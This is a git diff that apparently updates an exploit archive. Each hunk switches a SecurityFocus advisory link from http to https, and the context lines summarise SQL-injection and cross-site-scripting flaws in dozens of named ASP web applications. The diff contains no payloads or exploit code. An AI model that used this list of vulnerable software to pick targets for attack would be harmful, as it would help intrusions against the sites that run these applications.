@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22052/info +source: https://www.securityfocus.com/bid/22052/info InstantForum.NET is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/29533.html b/exploits/asp/webapps/29533.html index e69135237..88a3fe1a9 100644 --- a/exploits/asp/webapps/29533.html +++ b/exploits/asp/webapps/29533.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22281/info +source: https://www.securityfocus.com/bid/22281/info AdMentor is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29596.txt b/exploits/asp/webapps/29596.txt index bd30fb505..41586bd4d 100644 --- a/exploits/asp/webapps/29596.txt +++ b/exploits/asp/webapps/29596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22528/info +source: https://www.securityfocus.com/bid/22528/info eWay is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29597.txt b/exploits/asp/webapps/29597.txt index b09d358b5..8bcf4c556 100644 --- a/exploits/asp/webapps/29597.txt +++ b/exploits/asp/webapps/29597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22529/info +source: https://www.securityfocus.com/bid/22529/info Community Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29600.txt b/exploits/asp/webapps/29600.txt index cba607045..cb0cbc9be 100644 --- a/exploits/asp/webapps/29600.txt +++ b/exploits/asp/webapps/29600.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22545/info +source: https://www.securityfocus.com/bid/22545/info Fullaspsite Shop is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29601.txt b/exploits/asp/webapps/29601.txt index 208d3ab80..2b352f712 100644 --- a/exploits/asp/webapps/29601.txt +++ b/exploits/asp/webapps/29601.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22545/info +source: https://www.securityfocus.com/bid/22545/info Fullaspsite Shop is prone to multiple input-validation issues, including multiple cross-site scripting issues and an SQL-injection issue, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/29611.txt b/exploits/asp/webapps/29611.txt index 30673668e..23a73e542 100644 --- a/exploits/asp/webapps/29611.txt +++ b/exploits/asp/webapps/29611.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22591/info +source: https://www.securityfocus.com/bid/22591/info Turuncu Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29622.txt b/exploits/asp/webapps/29622.txt index b10c6bc1f..338fefc04 100644 --- a/exploits/asp/webapps/29622.txt +++ b/exploits/asp/webapps/29622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22636/info +source: https://www.securityfocus.com/bid/22636/info Userpages2 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29726.pl b/exploits/asp/webapps/29726.pl index eaa189d28..231d5daa9 100755 --- a/exploits/asp/webapps/29726.pl +++ b/exploits/asp/webapps/29726.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22910/info +source: https://www.securityfocus.com/bid/22910/info Duyuru Scripti is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/29817.txt b/exploits/asp/webapps/29817.txt index a99cea56d..2c9aabb9e 100644 --- a/exploits/asp/webapps/29817.txt +++ b/exploits/asp/webapps/29817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23316/info +source: https://www.securityfocus.com/bid/23316/info Gazi Okul Sitesi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29929.txt b/exploits/asp/webapps/29929.txt index f6784ca5d..c03282343 100644 --- a/exploits/asp/webapps/29929.txt +++ b/exploits/asp/webapps/29929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23678/info +source: https://www.securityfocus.com/bid/23678/info Burak Yilmaz Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29933.txt b/exploits/asp/webapps/29933.txt index eae02d505..ecf9bff47 100644 --- a/exploits/asp/webapps/29933.txt +++ b/exploits/asp/webapps/29933.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23714/info +source: https://www.securityfocus.com/bid/23714/info Gazi Download Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/29958.txt b/exploits/asp/webapps/29958.txt index 6f067319f..208f9c5cc 100644 --- a/exploits/asp/webapps/29958.txt +++ b/exploits/asp/webapps/29958.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/23850/info +source: https://www.securityfocus.com/bid/23850/info fipsCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30048.html b/exploits/asp/webapps/30048.html index 1f5ac13fc..d990e2736 100644 --- a/exploits/asp/webapps/30048.html +++ b/exploits/asp/webapps/30048.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24033/info +source: https://www.securityfocus.com/bid/24033/info VP-ASP Shopping Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30077.txt b/exploits/asp/webapps/30077.txt index 9eeeeea63..11fa7bda6 100644 --- a/exploits/asp/webapps/30077.txt +++ b/exploits/asp/webapps/30077.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24119/info +source: https://www.securityfocus.com/bid/24119/info Cisco CallManager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/30141.txt b/exploits/asp/webapps/30141.txt index 62ec55bcf..553088528 100644 --- a/exploits/asp/webapps/30141.txt +++ b/exploits/asp/webapps/30141.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24288/info +source: https://www.securityfocus.com/bid/24288/info Hünkaray Okul Portalý is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30159.txt b/exploits/asp/webapps/30159.txt index 1c7eb1a0f..dd7cc7de8 100644 --- a/exploits/asp/webapps/30159.txt +++ b/exploits/asp/webapps/30159.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24345/info +source: https://www.securityfocus.com/bid/24345/info ASP Folder Gallery is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/30165.txt b/exploits/asp/webapps/30165.txt index fca313069..08caea230 100644 --- a/exploits/asp/webapps/30165.txt +++ b/exploits/asp/webapps/30165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24379/info +source: https://www.securityfocus.com/bid/24379/info Ibrahim Ã?AKICI Okul Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30198.txt b/exploits/asp/webapps/30198.txt index 567ee2340..bcd095970 100644 --- a/exploits/asp/webapps/30198.txt +++ b/exploits/asp/webapps/30198.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24515/info +source: https://www.securityfocus.com/bid/24515/info TDizin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30203.txt b/exploits/asp/webapps/30203.txt index d9590dd69..c44bf8d67 100644 --- a/exploits/asp/webapps/30203.txt +++ b/exploits/asp/webapps/30203.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24562/info +source: https://www.securityfocus.com/bid/24562/info Comersus Cart is affected by multiple input validation vulnerabilities. diff --git a/exploits/asp/webapps/30204.txt b/exploits/asp/webapps/30204.txt index 81e6260d2..190c7230e 100644 --- a/exploits/asp/webapps/30204.txt +++ b/exploits/asp/webapps/30204.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24562/info +source: https://www.securityfocus.com/bid/24562/info Comersus Cart is affected by multiple input validation vulnerabilities. 
diff --git a/exploits/asp/webapps/30205.txt b/exploits/asp/webapps/30205.txt index dd0143493..88adb5c9b 100644 --- a/exploits/asp/webapps/30205.txt +++ b/exploits/asp/webapps/30205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24562/info +source: https://www.securityfocus.com/bid/24562/info Comersus Cart is affected by multiple input validation vulnerabilities. diff --git a/exploits/asp/webapps/30207.txt b/exploits/asp/webapps/30207.txt index 1fc2538c4..d049ac376 100644 --- a/exploits/asp/webapps/30207.txt +++ b/exploits/asp/webapps/30207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24563/info +source: https://www.securityfocus.com/bid/24563/info FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/30250.txt b/exploits/asp/webapps/30250.txt index 613f5ca3c..d7d079c69 100644 --- a/exploits/asp/webapps/30250.txt +++ b/exploits/asp/webapps/30250.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24637/info +source: https://www.securityfocus.com/bid/24637/info DUClassmate is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30282.txt b/exploits/asp/webapps/30282.txt index 4d910bf9c..1a0f47df4 100644 --- a/exploits/asp/webapps/30282.txt +++ b/exploits/asp/webapps/30282.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24794/info +source: https://www.securityfocus.com/bid/24794/info Levent Veysi Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30289.txt b/exploits/asp/webapps/30289.txt index c525e4796..bba4685c6 100644 --- a/exploits/asp/webapps/30289.txt +++ b/exploits/asp/webapps/30289.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24860/info +source: https://www.securityfocus.com/bid/24860/info enVivo!CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30296.txt b/exploits/asp/webapps/30296.txt index 8596e1a6a..280f1cc4c 100644 --- a/exploits/asp/webapps/30296.txt +++ b/exploits/asp/webapps/30296.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24894/info +source: https://www.securityfocus.com/bid/24894/info activeWeb contentserver is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30297.txt b/exploits/asp/webapps/30297.txt index 22b3566b8..42827354f 100644 --- a/exploits/asp/webapps/30297.txt +++ b/exploits/asp/webapps/30297.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24895/info +source: https://www.securityfocus.com/bid/24895/info activeWeb contentserver is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30298.txt b/exploits/asp/webapps/30298.txt index 3a2b8b459..cdb0b2739 100644 --- a/exploits/asp/webapps/30298.txt +++ b/exploits/asp/webapps/30298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24895/info +source: https://www.securityfocus.com/bid/24895/info activeWeb contentserver is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30300.txt b/exploits/asp/webapps/30300.txt index 3281c2aed..11d1dbec7 100644 --- a/exploits/asp/webapps/30300.txt +++ b/exploits/asp/webapps/30300.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24909/info +source: https://www.securityfocus.com/bid/24909/info MzK Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30313.txt b/exploits/asp/webapps/30313.txt index 4d2a9467d..0c7bddb7d 100644 --- a/exploits/asp/webapps/30313.txt +++ b/exploits/asp/webapps/30313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24923/info +source: https://www.securityfocus.com/bid/24923/info TBDev.NET DR is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/asp/webapps/30316.txt b/exploits/asp/webapps/30316.txt index 66a8523dc..4f02a0e56 100644 --- a/exploits/asp/webapps/30316.txt +++ b/exploits/asp/webapps/30316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24928/info +source: https://www.securityfocus.com/bid/24928/info The 'husrevforum' program is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30327.html b/exploits/asp/webapps/30327.html index 849b94eca..43797ab27 100644 --- a/exploits/asp/webapps/30327.html +++ b/exploits/asp/webapps/30327.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25004/info +source: https://www.securityfocus.com/bid/25004/info Dora Emlak Script is prone to multiple input-validation vulnerabilities, including HTML-injection and SQL-injection issues, because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30328.txt b/exploits/asp/webapps/30328.txt index 0c82704a8..6354761c3 100644 --- a/exploits/asp/webapps/30328.txt +++ b/exploits/asp/webapps/30328.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25005/info +source: https://www.securityfocus.com/bid/25005/info Alisveris Sitesi Scripti is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30330.txt b/exploits/asp/webapps/30330.txt index 22ac6b97a..023f3e4f4 100644 --- a/exploits/asp/webapps/30330.txt +++ b/exploits/asp/webapps/30330.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25007/info +source: https://www.securityfocus.com/bid/25007/info Alisveris Sitesi Scripti is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30331.html b/exploits/asp/webapps/30331.html index 2d25030a0..1b3ecb993 100644 --- a/exploits/asp/webapps/30331.html +++ b/exploits/asp/webapps/30331.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25008/info +source: https://www.securityfocus.com/bid/25008/info Asp cvmatik is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/asp/webapps/30332.txt b/exploits/asp/webapps/30332.txt index 6c1c8d9c0..7a144b0e9 100644 --- a/exploits/asp/webapps/30332.txt +++ b/exploits/asp/webapps/30332.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25010/info +source: https://www.securityfocus.com/bid/25010/info Image Racer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30382.txt b/exploits/asp/webapps/30382.txt index 58eaf001b..bedc0821f 100644 --- a/exploits/asp/webapps/30382.txt +++ b/exploits/asp/webapps/30382.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25055/info +source: https://www.securityfocus.com/bid/25055/info W1L3D4 Philboard is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30402.txt b/exploits/asp/webapps/30402.txt index a050ad484..1298b1759 100644 --- a/exploits/asp/webapps/30402.txt +++ b/exploits/asp/webapps/30402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25081/info +source: https://www.securityfocus.com/bid/25081/info Nukedit is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30423.txt b/exploits/asp/webapps/30423.txt index 1bc6f12ff..c011d53c4 100644 --- a/exploits/asp/webapps/30423.txt +++ b/exploits/asp/webapps/30423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25096/info +source: https://www.securityfocus.com/bid/25096/info Metyus Forum Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30424.txt b/exploits/asp/webapps/30424.txt index f3ab071f9..aa19db454 100644 --- a/exploits/asp/webapps/30424.txt +++ b/exploits/asp/webapps/30424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25109/info +source: https://www.securityfocus.com/bid/25109/info Berthanas Ziyaretci Defteri is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30425.txt b/exploits/asp/webapps/30425.txt index 9dfa86378..92ddd5848 100644 --- a/exploits/asp/webapps/30425.txt +++ b/exploits/asp/webapps/30425.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25112/info +source: https://www.securityfocus.com/bid/25112/info Online Store Application Template is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30426.txt b/exploits/asp/webapps/30426.txt index a739797f2..f22f18e1a 100644 --- a/exploits/asp/webapps/30426.txt +++ b/exploits/asp/webapps/30426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25113/info +source: https://www.securityfocus.com/bid/25113/info Message Board / Threaded Discussion Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30427.txt b/exploits/asp/webapps/30427.txt index ff1033475..15bca5dcc 100644 --- a/exploits/asp/webapps/30427.txt +++ b/exploits/asp/webapps/30427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25114/info +source: https://www.securityfocus.com/bid/25114/info Pay Roll - Time Sheet and Punch Card Application With Web Interface is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30428.txt b/exploits/asp/webapps/30428.txt index e8c9f1fd0..ca57bee6d 100644 --- a/exploits/asp/webapps/30428.txt +++ b/exploits/asp/webapps/30428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25115/info +source: https://www.securityfocus.com/bid/25115/info Real Estate Listing Website Application Template is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30446.txt b/exploits/asp/webapps/30446.txt index 9b5cf4186..26ccb8605 100644 --- a/exploits/asp/webapps/30446.txt +++ b/exploits/asp/webapps/30446.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25185/info +source: https://www.securityfocus.com/bid/25185/info Hunkaray Okul Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30451.txt b/exploits/asp/webapps/30451.txt index bb7d14b92..0b5835ab0 100644 --- a/exploits/asp/webapps/30451.txt +++ b/exploits/asp/webapps/30451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25195/info +source: https://www.securityfocus.com/bid/25195/info Next Gen Portfolio Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30505.txt b/exploits/asp/webapps/30505.txt index 6f205a8e5..69f7100a6 100644 --- a/exploits/asp/webapps/30505.txt +++ b/exploits/asp/webapps/30505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25350/info +source: https://www.securityfocus.com/bid/25350/info Text File Search Classic is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30541.txt b/exploits/asp/webapps/30541.txt index 2e0fc136e..0f4d2cec1 100644 --- a/exploits/asp/webapps/30541.txt +++ b/exploits/asp/webapps/30541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25480/info +source: https://www.securityfocus.com/bid/25480/info Cisco Unified CallManager and Unified Communications Manager are prone to multiple input-validation vulnerabilities because the applications fail to properly sanitize user-supplied input. These issues include a cross-site scripting vulnerability and an SQL-injection vulnerability. diff --git a/exploits/asp/webapps/30545.txt b/exploits/asp/webapps/30545.txt index 41af2b604..f0eface99 100644 --- a/exploits/asp/webapps/30545.txt +++ b/exploits/asp/webapps/30545.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25492/info +source: https://www.securityfocus.com/bid/25492/info Absolute Poll Manager XE is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30564.txt b/exploits/asp/webapps/30564.txt index f3b62ffc2..1990ea1cb 100644 --- a/exploits/asp/webapps/30564.txt +++ b/exploits/asp/webapps/30564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25532/info +source: https://www.securityfocus.com/bid/25532/info E-Smart Cart is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30571.txt b/exploits/asp/webapps/30571.txt index 7f4899e7e..fc85fbdeb 100644 --- a/exploits/asp/webapps/30571.txt +++ b/exploits/asp/webapps/30571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25613/info +source: https://www.securityfocus.com/bid/25613/info Proxy Anket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30621.txt b/exploits/asp/webapps/30621.txt index 6f7b71340..9701d5977 100644 --- a/exploits/asp/webapps/30621.txt +++ b/exploits/asp/webapps/30621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25828/info +source: https://www.securityfocus.com/bid/25828/info Novus is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30624.txt b/exploits/asp/webapps/30624.txt index 498e0f490..949293582 100644 --- a/exploits/asp/webapps/30624.txt +++ b/exploits/asp/webapps/30624.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25875/info +source: https://www.securityfocus.com/bid/25875/info Netkamp Emlak Scripti is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues and an SQL-injection issue, because the application fails to sanitize user-supplied input. diff --git a/exploits/asp/webapps/30625.txt b/exploits/asp/webapps/30625.txt index d32196f4b..9e1927561 100644 --- a/exploits/asp/webapps/30625.txt +++ b/exploits/asp/webapps/30625.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25880/info +source: https://www.securityfocus.com/bid/25880/info Ohesa Emlak Portal is prone to multiple SQL-injection vulnerabilities because it fails to adequately sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30626.txt b/exploits/asp/webapps/30626.txt index 7084999ba..27aacaff5 100644 --- a/exploits/asp/webapps/30626.txt +++ b/exploits/asp/webapps/30626.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25880/info +source: https://www.securityfocus.com/bid/25880/info Ohesa Emlak Portal is prone to multiple SQL-injection vulnerabilities because it fails to adequately sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30629.txt b/exploits/asp/webapps/30629.txt index 3beee561a..ac9b8832c 100644 --- a/exploits/asp/webapps/30629.txt +++ b/exploits/asp/webapps/30629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25884/info +source: https://www.securityfocus.com/bid/25884/info ASP Product Catalog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30696.txt b/exploits/asp/webapps/30696.txt index dd3a0b7f0..7036de46b 100644 --- a/exploits/asp/webapps/30696.txt +++ b/exploits/asp/webapps/30696.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26142/info +source: https://www.securityfocus.com/bid/26142/info SearchSimon Lite is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/30706.txt b/exploits/asp/webapps/30706.txt index 583a8973e..ae4494ebb 100644 --- a/exploits/asp/webapps/30706.txt +++ b/exploits/asp/webapps/30706.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26193/info +source: https://www.securityfocus.com/bid/26193/info CodeWidgets Web Based Alpha Tabbed Address Book is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30708.txt b/exploits/asp/webapps/30708.txt index 056f9b32a..b62de5a21 100644 --- a/exploits/asp/webapps/30708.txt +++ b/exploits/asp/webapps/30708.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26207/info +source: https://www.securityfocus.com/bid/26207/info Aleris Web Publishing Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30743.txt b/exploits/asp/webapps/30743.txt index 48d81ee62..a5e9be7f5 100644 --- a/exploits/asp/webapps/30743.txt +++ b/exploits/asp/webapps/30743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26348/info +source: https://www.securityfocus.com/bid/26348/info i-Gallery is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30747.txt b/exploits/asp/webapps/30747.txt index f3eae9794..f37879adb 100644 --- a/exploits/asp/webapps/30747.txt +++ b/exploits/asp/webapps/30747.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26379/info +source: https://www.securityfocus.com/bid/26379/info Rapid Classified is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30775.txt b/exploits/asp/webapps/30775.txt index 893dca2ed..881abf432 100644 --- a/exploits/asp/webapps/30775.txt +++ b/exploits/asp/webapps/30775.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26479/info +source: https://www.securityfocus.com/bid/26479/info JiRo's Banner System is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30778.txt b/exploits/asp/webapps/30778.txt index cf3335097..9a632ec07 100644 --- a/exploits/asp/webapps/30778.txt +++ b/exploits/asp/webapps/30778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26493/info +source: https://www.securityfocus.com/bid/26493/info Click&BaneX is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30793.txt b/exploits/asp/webapps/30793.txt index a64736045..7e9a6ba10 100644 --- a/exploits/asp/webapps/30793.txt +++ b/exploits/asp/webapps/30793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26522/info +source: https://www.securityfocus.com/bid/26522/info Mass Mailer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30794.txt b/exploits/asp/webapps/30794.txt index 898eaa458..6e7844051 100644 --- a/exploits/asp/webapps/30794.txt +++ b/exploits/asp/webapps/30794.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26523/info +source: https://www.securityfocus.com/bid/26523/info VUNET Case Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30796.txt b/exploits/asp/webapps/30796.txt index fd48eae73..0dc07a8d8 100644 --- a/exploits/asp/webapps/30796.txt +++ b/exploits/asp/webapps/30796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26526/info +source: https://www.securityfocus.com/bid/26526/info E-vanced Solutions E-vents is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/30800.html b/exploits/asp/webapps/30800.html index 321d29a12..9dc2e1a1a 100644 --- a/exploits/asp/webapps/30800.html +++ b/exploits/asp/webapps/30800.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26552/info +source: https://www.securityfocus.com/bid/26552/info FooSun is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30807.txt b/exploits/asp/webapps/30807.txt index 12faf5cd2..2d98f4db5 100644 --- a/exploits/asp/webapps/30807.txt +++ b/exploits/asp/webapps/30807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26579/info +source: https://www.securityfocus.com/bid/26579/info DWD Realty is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30841.txt b/exploits/asp/webapps/30841.txt index 21bbde50b..8751e7c85 100644 --- a/exploits/asp/webapps/30841.txt +++ b/exploits/asp/webapps/30841.txt 
